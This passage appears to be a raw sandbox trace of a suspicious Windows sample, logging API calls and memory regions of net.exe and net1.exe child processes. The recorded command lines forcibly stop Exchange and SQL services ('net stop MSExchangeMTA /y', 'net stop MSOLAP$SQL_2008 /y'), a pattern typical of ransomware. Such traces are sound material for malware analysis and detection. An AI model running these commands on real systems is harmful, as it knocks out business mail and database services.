(_String1="lanmanserver", _String2="MSExchangeMGMT") returned -1 [0101.654] _wcsicmp (_String1="alerter", _String2="MSExchangeMGMT") returned -12 [0101.654] _wcsicmp (_String1="netlogon", _String2="MSExchangeMGMT") returned 1 [0101.654] _wcsupr (in: _String="MSExchangeMGMT" | out: _String="MSEXCHANGEMGMT") returned="MSEXCHANGEMGMT" [0101.654] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2ace10 [0101.658] GetServiceKeyNameW (in: hSCManager=0x2ace10, lpDisplayName="MSEXCHANGEMGMT", lpServiceName=0xff1b5750, lpcchBuffer=0x12f868 | out: lpServiceName="", lpcchBuffer=0x12f868) returned 0 [0101.659] _wcsicmp (_String1="msg", _String2="MSEXCHANGEMGMT") returned 2 [0101.659] _wcsicmp (_String1="messenger", _String2="MSEXCHANGEMGMT") returned -14 [0101.659] _wcsicmp (_String1="receiver", _String2="MSEXCHANGEMGMT") returned 5 [0101.659] _wcsicmp (_String1="rcv", _String2="MSEXCHANGEMGMT") returned 5 [0101.659] _wcsicmp (_String1="redirector", _String2="MSEXCHANGEMGMT") returned 5 [0101.659] _wcsicmp (_String1="redir", _String2="MSEXCHANGEMGMT") returned 5 [0101.659] _wcsicmp (_String1="rdr", _String2="MSEXCHANGEMGMT") returned 5 [0101.659] _wcsicmp (_String1="workstation", _String2="MSEXCHANGEMGMT") returned 10 [0101.659] _wcsicmp (_String1="work", _String2="MSEXCHANGEMGMT") returned 10 [0101.659] _wcsicmp (_String1="wksta", _String2="MSEXCHANGEMGMT") returned 10 [0101.659] _wcsicmp (_String1="prdr", _String2="MSEXCHANGEMGMT") returned 3 [0101.659] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGEMGMT") returned -9 [0101.659] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGEMGMT") returned -1 [0101.660] _wcsicmp (_String1="server", _String2="MSEXCHANGEMGMT") returned 6 [0101.660] _wcsicmp (_String1="svr", _String2="MSEXCHANGEMGMT") returned 6 [0101.660] _wcsicmp (_String1="srv", _String2="MSEXCHANGEMGMT") returned 6 [0101.660] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGEMGMT") returned -1 [0101.660] _wcsicmp (_String1="alerter", _String2="MSEXCHANGEMGMT") returned -12 [0101.660] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGEMGMT") returned 1 [0101.660] NetServiceControl (in: servername=0x0, service="MSEXCHANGEMGMT", opcode=0x0, arg=0x0, bufptr=0x12f870 | out: bufptr=0x12f870) returned 0x889 [0101.660] wcscpy_s (in: _Destination=0xff1b80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0101.661] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0101.661] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff1b5b50, nSize=0x800, Arguments=0xff1b7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0101.663] GetFileType (hFile=0xb) returned 0x2 [0101.663] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f738 | out: lpMode=0x12f738) returned 1 [0101.663] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff1b5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x12f730, lpReserved=0x0 | out: lpBuffer=0xff1b5b50*, lpNumberOfCharsWritten=0x12f730*=0x1e) returned 1 [0101.664] GetFileType (hFile=0xb) returned 0x2 [0101.664] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f738 | out: lpMode=0x12f738) returned 1 [0101.664] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff191efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12f730, lpReserved=0x0 | out: lpBuffer=0xff191efc*, lpNumberOfCharsWritten=0x12f730*=0x2) returned 1 [0101.664] _ultow (in: _Dest=0x889, _Radix=1243040 | out: _Dest=0x889) returned="2185" [0101.664] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff1b5b50, nSize=0x800, Arguments=0xff1b7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0101.664] GetFileType (hFile=0xb) returned 0x2 [0101.665] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f738 | out: lpMode=0x12f738) returned 1 [0101.665] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff1b5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x12f730, lpReserved=0x0 | out: lpBuffer=0xff1b5b50*, lpNumberOfCharsWritten=0x12f730*=0x34) returned 1 [0101.665] GetFileType (hFile=0xb) returned 0x2 [0101.665] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f738 | out: lpMode=0x12f738) returned 1 [0101.666] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff191efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12f730, lpReserved=0x0 | out: lpBuffer=0xff191efc*, lpNumberOfCharsWritten=0x12f730*=0x2) returned 1 [0101.666] NetApiBufferFree (Buffer=0x2a4d50) returned 0x0 [0101.666] NetApiBufferFree (Buffer=0x2ac100) returned 0x0 [0101.666] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeMGMT /y" [0101.666] exit (_Code=2) Process: id = "166" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x58108000" os_pid = "0xa24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSOLAP$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7033 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7034 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7035 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7036 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 7037 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7038 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7039 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7040 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 7041 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7042 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7043 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 7044 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 7045 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 7046 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7047 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 598 os_tid = 0xa30 Process: id = "167" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x58b28000" os_pid = "0x80c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSOLAP$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7074 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7075 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7076 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7077 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 7078 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7079 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7080 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7081 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 7082 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7083 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7084 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 7085 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 7086 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 7087 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7088 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 600 os_tid = 0x544 Process: id = "168" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x59045000" os_pid = "0x324" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "158" os_parent_pid = "0x12ec" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeMTA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7089 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7090 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7091 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7092 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 7093 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7094 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7095 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7096 start_va = 0xff630000 end_va = 0xff662fff entry_point = 0xff630000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 7097 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7098 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7099 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 7100 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 7101 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 7102 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7103 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7104 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7105 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7106 start_va = 0x130000 end_va = 0x196fff entry_point = 0x130000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7107 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 7108 start_va = 0x5f0000 end_va = 0x5fffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 7109 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7110 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7111 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 7112 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 7113 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 7114 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 7115 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 7116 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 7117 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 7118 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 7119 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 7120 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 7121 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7122 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7123 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7124 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7125 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7126 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7127 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 602 os_tid = 0x1334 [0101.809] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fa10 | out: lpSystemTimeAsFileTime=0x12fa10*(dwLowDateTime=0xf1dad130, dwHighDateTime=0x1d48689)) [0101.809] GetCurrentProcessId () returned 0x324 [0101.809] GetCurrentThreadId () returned 0x1334 [0101.809] GetTickCount () returned 0x2339d [0101.809] QueryPerformanceCounter (in: lpPerformanceCount=0x12fa18 | out: lpPerformanceCount=0x12fa18*=1814872700000) returned 1 [0101.810] GetModuleHandleW (lpModuleName=0x0) returned 0xff630000 [0101.810] __set_app_type (_Type=0x1) [0101.810] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff649c9c) returned 0x0 [0101.810] __getmainargs (in: _Argc=0xff654780, _Argv=0xff654790, _Env=0xff654788, _DoWildCard=0, _StartInfo=0xff65479c | out: _Argc=0xff654780, _Argv=0xff654790, _Env=0xff654788) returned 0 [0101.810] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0101.811] GetConsoleOutputCP () returned 0x1b5 [0101.811] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff65cec0 | out: lpCPInfo=0xff65cec0) returned 1 [0101.811] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0101.813] sprintf_s (in: _DstBuf=0x12f9b8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0101.813] setlocale (category=0, locale=".437") returned="English_United States.437" [0101.852] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0101.852] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0101.852] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeMTA /y" [0101.852] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12f750, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0101.852] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0101.852] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12f9a8 | out: Buffer=0x12f9a8*=0x334d50) returned 0x0 [0101.852] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12f9a8 | out: Buffer=0x12f9a8*=0x33c100) returned 0x0 [0101.852] _fileno (_File=0x7fefdba2a80) returned 0 [0101.852] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0101.852] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0101.852] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0101.852] _wcsicmp (_String1="config", _String2="stop") returned -16 [0101.852] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0101.852] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0101.853] _wcsicmp (_String1="file", _String2="stop") returned -13 [0101.853] _wcsicmp (_String1="files", _String2="stop") returned -13 [0101.853] _wcsicmp (_String1="group", _String2="stop") returned -12 [0101.853] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0101.853] _wcsicmp (_String1="help", _String2="stop") returned -11 [0101.853] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0101.853] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0101.853] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0101.853] _wcsicmp (_String1="session", _String2="stop") returned -15 [0101.853] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0101.853] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0101.853] _wcsicmp (_String1="share", _String2="stop") returned -12 [0101.853] _wcsicmp (_String1="start", _String2="stop") returned -14 [0101.853] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0101.853] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0101.853] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0101.853] _wcsicmp (_String1="accounts", _String2="MSExchangeMTA") returned -12 [0101.853] _wcsicmp (_String1="computer", _String2="MSExchangeMTA") returned -10 [0101.853] _wcsicmp (_String1="config", _String2="MSExchangeMTA") returned -10 [0101.853] _wcsicmp (_String1="continue", _String2="MSExchangeMTA") returned -10 [0101.853] _wcsicmp (_String1="cont", _String2="MSExchangeMTA") returned -10 [0101.853] _wcsicmp (_String1="file", _String2="MSExchangeMTA") returned -7 [0101.853] _wcsicmp (_String1="files", _String2="MSExchangeMTA") returned -7 [0101.853] _wcsicmp (_String1="group", _String2="MSExchangeMTA") returned -6 [0101.853] _wcsicmp (_String1="groups", _String2="MSExchangeMTA") returned -6 [0101.853] _wcsicmp (_String1="help", _String2="MSExchangeMTA") returned -5 [0101.853] _wcsicmp (_String1="helpmsg", _String2="MSExchangeMTA") returned -5 [0101.853] _wcsicmp (_String1="localgroup", _String2="MSExchangeMTA") returned -1 [0101.853] _wcsicmp (_String1="pause", _String2="MSExchangeMTA") returned 3 [0101.853] _wcsicmp (_String1="session", _String2="MSExchangeMTA") returned 6 [0101.853] _wcsicmp (_String1="sessions", _String2="MSExchangeMTA") returned 6 [0101.853] _wcsicmp (_String1="sess", _String2="MSExchangeMTA") returned 6 [0101.853] _wcsicmp (_String1="share", _String2="MSExchangeMTA") returned 6 [0101.853] _wcsicmp (_String1="start", _String2="MSExchangeMTA") returned 6 [0101.853] _wcsicmp (_String1="stats", _String2="MSExchangeMTA") returned 6 [0101.853] _wcsicmp (_String1="statistics", _String2="MSExchangeMTA") returned 6 [0101.853] _wcsicmp (_String1="stop", _String2="MSExchangeMTA") returned 6 [0101.853] _wcsicmp (_String1="time", _String2="MSExchangeMTA") returned 7 [0101.854] _wcsicmp (_String1="user", _String2="MSExchangeMTA") returned 8 [0101.854] _wcsicmp (_String1="users", _String2="MSExchangeMTA") returned 8 [0101.854] _wcsicmp (_String1="msg", _String2="MSExchangeMTA") returned 2 [0101.854] _wcsicmp (_String1="messenger", _String2="MSExchangeMTA") returned -14 [0101.854] _wcsicmp (_String1="receiver", _String2="MSExchangeMTA") returned 5 [0101.854] _wcsicmp (_String1="rcv", _String2="MSExchangeMTA") returned 5 [0101.854] _wcsicmp (_String1="netpopup", _String2="MSExchangeMTA") returned 1 [0101.854] _wcsicmp (_String1="redirector", _String2="MSExchangeMTA") returned 5 [0101.854] _wcsicmp (_String1="redir", _String2="MSExchangeMTA") returned 5 [0101.854] _wcsicmp (_String1="rdr", _String2="MSExchangeMTA") returned 5 [0101.854] _wcsicmp (_String1="workstation", _String2="MSExchangeMTA") returned 10 [0101.854] _wcsicmp (_String1="work", _String2="MSExchangeMTA") returned 10 [0101.854] _wcsicmp (_String1="wksta", _String2="MSExchangeMTA") returned 10 [0101.854] _wcsicmp (_String1="prdr", _String2="MSExchangeMTA") returned 3 [0101.854] _wcsicmp (_String1="devrdr", _String2="MSExchangeMTA") returned -9 [0101.854] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeMTA") returned -1 [0101.854] _wcsicmp (_String1="server", _String2="MSExchangeMTA") returned 6 [0101.854] _wcsicmp (_String1="svr", _String2="MSExchangeMTA") returned 6 [0101.854] _wcsicmp (_String1="srv", _String2="MSExchangeMTA") returned 6 [0101.854] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeMTA") returned -1 [0101.854] _wcsicmp (_String1="alerter", _String2="MSExchangeMTA") returned -12 [0101.854] _wcsicmp (_String1="netlogon", _String2="MSExchangeMTA") returned 1 [0101.854] _wcsupr (in: _String="MSExchangeMTA" | out: _String="MSEXCHANGEMTA") returned="MSEXCHANGEMTA" [0101.854] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x33ce10 [0101.857] GetServiceKeyNameW (in: hSCManager=0x33ce10, lpDisplayName="MSEXCHANGEMTA", lpServiceName=0xff655750, lpcchBuffer=0x12f8c8 | out: lpServiceName="", lpcchBuffer=0x12f8c8) returned 0 [0101.858] _wcsicmp (_String1="msg", _String2="MSEXCHANGEMTA") returned 2 [0101.858] _wcsicmp (_String1="messenger", _String2="MSEXCHANGEMTA") returned -14 [0101.858] _wcsicmp (_String1="receiver", _String2="MSEXCHANGEMTA") returned 5 [0101.858] _wcsicmp (_String1="rcv", _String2="MSEXCHANGEMTA") returned 5 [0101.858] _wcsicmp (_String1="redirector", _String2="MSEXCHANGEMTA") returned 5 [0101.858] _wcsicmp (_String1="redir", _String2="MSEXCHANGEMTA") returned 5 